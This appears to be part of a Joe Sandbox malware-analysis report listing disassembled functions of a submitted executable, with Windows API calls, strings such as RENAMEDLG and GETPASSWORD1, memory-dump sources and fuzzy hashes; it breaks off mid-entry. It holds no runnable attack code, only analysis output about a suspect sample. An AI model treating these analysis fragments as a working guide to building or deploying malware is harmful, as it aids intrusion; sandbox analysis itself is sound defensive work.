LeaveCriticalSection.KERNEL32(00401E74,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?,00008000,?), ref: 003CFB8B
LeaveCriticalSection.KERNEL32(00401E74,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF,?,00008000,?), ref: 003CFB96

Part of subcall function 003CF930: InitializeCriticalSection.KERNEL32(000001A0,00401E74,00000000,?,?,003CFB88,00000020,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?), ref: 003CF969
Part of subcall function 003CF930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF973
Part of subcall function 003CF930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF983

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
String ID:
API String ID: 3919453512-0
Opcode ID: 24388f7f158c7875e4a97f67e1c1eac5f56d912dc2be5be0dbca4670c9b6b762
Instruction ID: 7bb00790545ef8742e0b5e739b0c9255e5b38fcf719bfdb27650c35606b4ab4a
Opcode Fuzzy Hash: 24388f7f158c7875e4a97f67e1c1eac5f56d912dc2be5be0dbca4670c9b6b762
Instruction Fuzzy Hash: 4A117335A10212AFD7069B68ED15F7D76BAAB49750F11413EF809E73E1DB708C00CB94

Function 003E631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,003FCBE8,003E2674,003FCBE8,?,?,003E2213,?,?,003FCBE8), ref: 003E6323
_free.LIBCMT ref: 003E6356
_free.LIBCMT ref: 003E637E
SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E638B
SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6397
_abort.LIBCMT ref: 003E639D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 9c3685aff69ad570a0668c9605c017aebd1c3951eec855026875e557b41e6e11
Instruction ID: a2e3d6d46be26f65b511aabc082146bf8eb7e732ac9e08d9d449a4d7b82c8536
Opcode Fuzzy Hash: 9c3685aff69ad570a0668c9605c017aebd1c3951eec855026875e557b41e6e11
Instruction Fuzzy Hash: 51F0F97A605BB126CB13273B6D4BB6A121D8FE27F1F360314F528961F3EF3188018151

Function 003DA8D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,?,?,?,00001000), ref: 003DA92C
CharUpperW.USER32(?,?,?,?,?,00001000), ref: 003DA953

Strings

*a@, xrefs: 003DA99C
-, xrefs: 003DA91A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CharUpper
String ID: *a@$-
API String ID: 9403516-174350541
Opcode ID: 80a85438e0a112dfbc017c9f90774331c46f717521da4ddf0f34c805c66c9d34
Instruction ID: 67f0fd483c04e514fecf8904ceb565a0f15b6e3cab25aadec837b62add52879c
Opcode Fuzzy Hash: 80a85438e0a112dfbc017c9f90774331c46f717521da4ddf0f34c805c66c9d34
Instruction Fuzzy Hash: F221F87340870E55D7139B28AB2CB77A798E785315F03482BF584DAB81E774C8A4D367

Function 003DB820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

EndDialog.USER32(?,00000001), ref: 003DB86B
GetDlgItemTextW.USER32(?,00000066,00000800), ref: 003DB881
SetDlgItemTextW.USER32(?,00000065,?), ref: 003DB89B
SetDlgItemTextW.USER32(?,00000066), ref: 003DB8A6

Strings

RENAMEDLG, xrefs: 003DB838

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 5bb8961fdca667ad039af570142b4b81198967439e26fe87e857f57e4b3945ea
Instruction ID: 1b003b8325855acd6319587902067909c7ceb42fd314abe0e8df0e730edb3f63
Opcode Fuzzy Hash: 5bb8961fdca667ad039af570142b4b81198967439e26fe87e857f57e4b3945ea
Instruction Fuzzy Hash: 5C01F973A40255F6D6134A657E44F77BB6CEB85F41F12042BF204B2590C3569C04E776

Function 003E4ADF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003E4A90,?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002), ref: 003E4AFF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003E4B12
FreeLibrary.KERNEL32(00000000,?,?,?,003E4A90,?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4B35

Strings

mscoree.dll, xrefs: 003E4AF8
CorExitProcess, xrefs: 003E4B0A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4d996d6dc9e80b89babcae97fa0d0c6673c465fc3914003071581bb290b7d795
Instruction ID: 2f6422da1a08680de6a57e598ccc9e3fa9b970baaf576380f9188bbd81591dc2
Opcode Fuzzy Hash: 4d996d6dc9e80b89babcae97fa0d0c6673c465fc3914003071581bb290b7d795
Instruction Fuzzy Hash: 4BF0AF35A00219BFCB0B9F99DC49BFEBFB8EF08712F010165F805A2291DB709940CA90

Function 003CDEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003CDED4
GetProcAddress.KERNEL32(00401E58,CryptUnprotectMemory), ref: 003CDEE4

Strings

CryptProtectMemory, xrefs: 003CDECE
CryptUnprotectMemory, xrefs: 003CDEDA
Crypt32.dll, xrefs: 003CDEBE

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 7b106ff1627cdba75b162444d3a9832cf7003e30cce138611df01a51324970b3
Instruction ID: e477c8096093073c0c10f93b7a17227cce6b5b13d581e4418659d361f022edf7
Opcode Fuzzy Hash: 7b106ff1627cdba75b162444d3a9832cf7003e30cce138611df01a51324970b3
Instruction Fuzzy Hash: 4BE04FB0500747AEDB475B799D48F65FB94BF50710F10852AF154C6642DBB4D4A4CB50

Function 003E52F0 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003E5362
_free.LIBCMT ref: 003E5382

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 814d87774ffa1a0ec261c969a1610a0b6b45fbfbbe32e383fea4bc4c49aa9814
Instruction ID: 48ad44df8fd93e9e4b2b3c44be51593f8d56cc8e27837485df64548c369d0063
Opcode Fuzzy Hash: 814d87774ffa1a0ec261c969a1610a0b6b45fbfbbe32e383fea4bc4c49aa9814
Instruction Fuzzy Hash: 8A41C176A006249FCB12DF79C881A5EB3F5EF88318F164669E515EB381DB71AD01CB80

Function 003E89AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 003E89B8
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E89DB

Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003E8A01
_free.LIBCMT ref: 003E8A14
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003E8A23

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 8515ba00986c070046fa8e4b47ca4a8c0bcdee6530fb4e245e9df291ba82454d
Instruction ID: 5680abc5a6b276a42599ccb901d4f4f3d63868113234c63d35be0a170ae89b64
Opcode Fuzzy Hash: 8515ba00986c070046fa8e4b47ca4a8c0bcdee6530fb4e245e9df291ba82454d
Instruction Fuzzy Hash: EC0184B2A016B57B272757BB5C4CC7B6A6DDAC6FA0315033AF908E7192EE608C0181B1

Function 003E63A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,003E5E43,003E5ADF,?,003E634D,00000001,00000364,?,003E2213,?,?,003FCBE8), ref: 003E63A8
_free.LIBCMT ref: 003E63DD
_free.LIBCMT ref: 003E6404
SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6411
SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E641A

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5a8a1438be383971c1cb8621b462761e808a80a3de6cc83498b6b580e4a174a0
Instruction ID: 6cb52c68ba64a899e30d18941282709d53a39bf0aa8dc0014fd360af466fe769
Opcode Fuzzy Hash: 5a8a1438be383971c1cb8621b462761e808a80a3de6cc83498b6b580e4a174a0
Instruction Fuzzy Hash: 3201D676245BA167C707262B2C8BA6A261D9FE17B5B324324F415A61E3EF358C018160

Function 003E926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003E9282

Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA

_free.LIBCMT ref: 003E9294
_free.LIBCMT ref: 003E92A6
_free.LIBCMT ref: 003E92B8
_free.LIBCMT ref: 003E92CA

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2266cdca54049f1e9f623ca40e84c198b70eee8edc309d5cc0e69cf86e9608ff
Instruction ID: 50bc729bfd9307b6a76547a7335fd01597002858e39d047acde4c355f21b2647
Opcode Fuzzy Hash: 2266cdca54049f1e9f623ca40e84c198b70eee8edc309d5cc0e69cf86e9608ff
Instruction Fuzzy Hash: 0FF0C272201BA4FBCE23EB5AE882D9637EDAA403A0B550E06F04CCB582C774FC80C750

Function 003E553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003E555D

Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA

_free.LIBCMT ref: 003E556F
_free.LIBCMT ref: 003E5582
_free.LIBCMT ref: 003E5593
_free.LIBCMT ref: 003E55A4

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 38d88bf62ce695365024e768e6634ccea7578c774f98666870bf70e640fd8d57
Instruction ID: e6e5a9f8f632b31520698b4aeffeeaf3bceb5c850941ca6279d82042dde3c312
Opcode Fuzzy Hash: 38d88bf62ce695365024e768e6634ccea7578c774f98666870bf70e640fd8d57
Instruction Fuzzy Hash: 92F030B4512A74DB8B036F19BD014983B64FB49724345832AF454562B2C7740822DBCB

Function 003E4BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000104), ref: 003E4C1A
_free.LIBCMT ref: 003E4CE5
_free.LIBCMT ref: 003E4CEF

Strings

C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, xrefs: 003E4C11, 003E4C18, 003E4C47, 003E4C7F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
API String ID: 2506810119-649463514
Opcode ID: c13fb35ee25c7fb285ad819271d0d2275c5d0a42ded11e71b6e0dbd94896bbff
Instruction ID: 1b95684fcac01cb27c1abc7ec0339c7d227265ad529e98dfdc8a5e46a9aff068
Opcode Fuzzy Hash: c13fb35ee25c7fb285ad819271d0d2275c5d0a42ded11e71b6e0dbd94896bbff
Instruction Fuzzy Hash: E0319771A012A8FFCB22DF5A9C8199EBBFCEB89710F214266F81497291D7705E40CB91

Function 003C7463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C7468

Part of subcall function 003C3AA3: __EH_prolog.LIBCMT ref: 003C3AA8

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 003C752E

Part of subcall function 003C7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 003C7AAC
Part of subcall function 003C7A9D: GetLastError.KERNEL32 ref: 003C7AF2
Part of subcall function 003C7A9D: CloseHandle.KERNEL32(?), ref: 003C7B01

Strings

SeRestorePrivilege, xrefs: 003C74C1
SeSecurityPrivilege, xrefs: 003C74AC

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: c6e27bd536db0ef70c1bceaa47955724df59af2580a2a92e7ef430b5729961e0
Instruction ID: 106bc633151ab961334fbdb6a16dbf3d06ccaffb5d6abb04980ee9f8e9678378
Opcode Fuzzy Hash: c6e27bd536db0ef70c1bceaa47955724df59af2580a2a92e7ef430b5729961e0
Instruction Fuzzy Hash: 3C318D75944248AADF22EB68DC42FEE7B68AF45310F00802AF849EB292D7744E44CB61

Function 003D9123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

EndDialog.USER32(?,00000001), ref: 003D91AB
GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 003D91C0
SetDlgItemTextW.USER32(?,00000065,?), ref: 003D91D5

Strings

ASKNEXTVOL, xrefs: 003D913B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 890cdc11d9783c7d4d582bc98bbbad06d0f8e6aaa5520c777676a359bcf345e5
Instruction ID: 968be40315462a260fcf5ccfd6fa5d2735ea32195389a8dc324f20d0dd73d114
Opcode Fuzzy Hash: 890cdc11d9783c7d4d582bc98bbbad06d0f8e6aaa5520c777676a359bcf345e5
Instruction Fuzzy Hash: F611D033245202BFD6139BA4ED4EFA63BADAB4A701F014423F201DB2A1C2629C55DB26

Function 003DBFAA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,?,003D9646,?,?), ref: 003DC022

Strings

